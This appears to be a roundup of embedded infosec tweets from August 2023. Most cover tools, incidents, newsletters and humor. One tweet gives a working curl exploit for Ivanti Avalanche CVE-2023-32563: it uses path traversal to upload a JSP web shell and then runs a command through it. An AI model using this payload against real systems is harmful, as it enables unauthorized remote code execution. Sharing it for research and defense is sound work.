... and this is pretty cool!#Ghidralligator is a C++ multi-architecture pcode emulator based on the #Ghidra libsla designed for #fuzzing with AFL++. It allows performing emulation-based fuzzing when dealing with binaries running on exotic architectures.https://t.co/V4RybiNrEC

— raptor@infosec.exchange (@0xdea) August 23, 2023

🚨 Wow. Imagine waking up, and your entire company's online presence is erased.

Email. Domain. Documents. Databases. Gone

Poof.

Well, that's what happened to customers of two hosting providers this week. 👇

— Matt Johansen (@mattjay) August 24, 2023

If I were a renaissance painter manager again, here's a stat I'd track:

Brush strokes on canvas.

Total weight of oil paint delivered on canvas.

I am sure this would help me get more Michelangelo paintings. https://t.co/mEPhxCqVtu

— Halvar Flake (@halvarflake) August 25, 2023

... ... and here is how the Chandrayaan-3 Rover ramped down from the Lander to the Lunar surface. pic.twitter.com/nEU8s1At0W

— ISRO (@isro) August 25, 2023

Meme explainer for #ransomware#cybersecurity #infosec #Memes pic.twitter.com/zTt0nYPYRz

— CyberKnow (@Cyberknow20) August 24, 2023

The Upside of Falling Down: Embracing Failure to be a Better Hacker (and Human) slides are up! Video from @HITBSecConf #HITB2023HKT coming soon. https://t.co/4mpE1oiI2B

— Joe Grand (@joegrand) August 25, 2023

https://t.co/uG5x8hplI1

— Dr. Dan Lomas (@Sandbagger_01) August 25, 2023

By accusing two Chinese nationals of spying for the U.S., China’s spymasters are warning citizens abroad to guard against CIA enticement https://t.co/gN1zw6j3Cb via @WSJ

— Dr. Dan Lomas (@Sandbagger_01) August 25, 2023

Ivanti Avalanche CVE-2023-32563:

curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe

— wvu (@wvuuuuuuuuuuuuu) August 25, 2023

We need more efforts like the ones supporting memory safety, but for securing open-source package repositories.

The @Phylum_IO research team has been putting out some outstanding reporting. https://t.co/SShsKSjKYs pic.twitter.com/UVQUrtu9pL

— Silas // p1nk (@silascutler) August 25, 2023

Weekly analysis is out

-🇨🇳 ops in 🇰🇷 using 🍟
-🇨🇳 ops in 🇭🇰 and SE Asia via supply chain
-🇰🇵 ops on ₿ get $2bil in 5 years
-🦹‍♀️ ops on 🍎 using signed code
-🦹🏻 ops deploying 📡 geo implants
-🦹🏽‍♂️ ops from 🇸🇾
- ☁️ backdoors

plus the usual tradecraft etc.https://t.co/MS0wJKGyKT

— Ollie Whitehouse (@ollieatnowhere) August 25, 2023

The UK's @NCSC has launched its research problem book - https://t.co/ecDFHB4rp4 cover 5 topics including:

- How can we build systems we can trust?
- How do we make system security assessments more data driven?

etc.https://t.co/uuGWhdazQz < support blog..

— Ollie Whitehouse (@ollieatnowhere) August 24, 2023

This week's SRB is out:
- Why Russia's Cyber War Against Ukraine Failed
- Advanced Persistent Teenagers
- The latest open source hippies

Read and subscribe here:https://t.co/zHBs4Vvsmu

Or listen: https://t.co/y5Xy7ztjUM pic.twitter.com/RLlyZfvrFw

— Tom Uren (@tomatospy) August 25, 2023

We haven't been very public with it yet, but @EricMichaud formally announced at @HITBSecConf Project Keybleed by Unciphered.

Looking for the haveibeenpwned of cryptowallets, here you go! https://t.co/FQHsJYD9eH

— Unciphered LLC (@uncipheredLLC) August 25, 2023

Lady was pissy when I insisted on walking with her to the parking lot, but it was raining and she had an umbrella.

— Forward March (@RunOldMan) September 14, 2020

me: I just want 2 minutes of privacy in the bathroom

my kid: best I can do is a paleontology lecture

— meghan (@deloisivete) January 28, 2022

A little old random fun fact about Exchange that probably not everyone knows. Very often you will see the the following "ou=Exchange Administrative Group\FYDIBOHF23SPDLT" referenced.

That FYDIBOHF23SPDLT might look random, but it is not. (Caesar's cipher 1 to the left 😉)

— Oddvar Moe (@Oddvarmoe) August 24, 2023

I come from a long line of successful people. I decided to stop that tradition.

— MomofTeen (@MomofTeen) March 14, 2015

Code Llama is here, including first release of a 34B Llama2 model. It is competitive with WizardCoder 15B (better at python, possibly worse at others) and beats GPT-3.5 in both HumanEval and MBPT coding benchmarks. https://t.co/nG7wPX7irw

— Richard Johnson (@richinseattle) August 25, 2023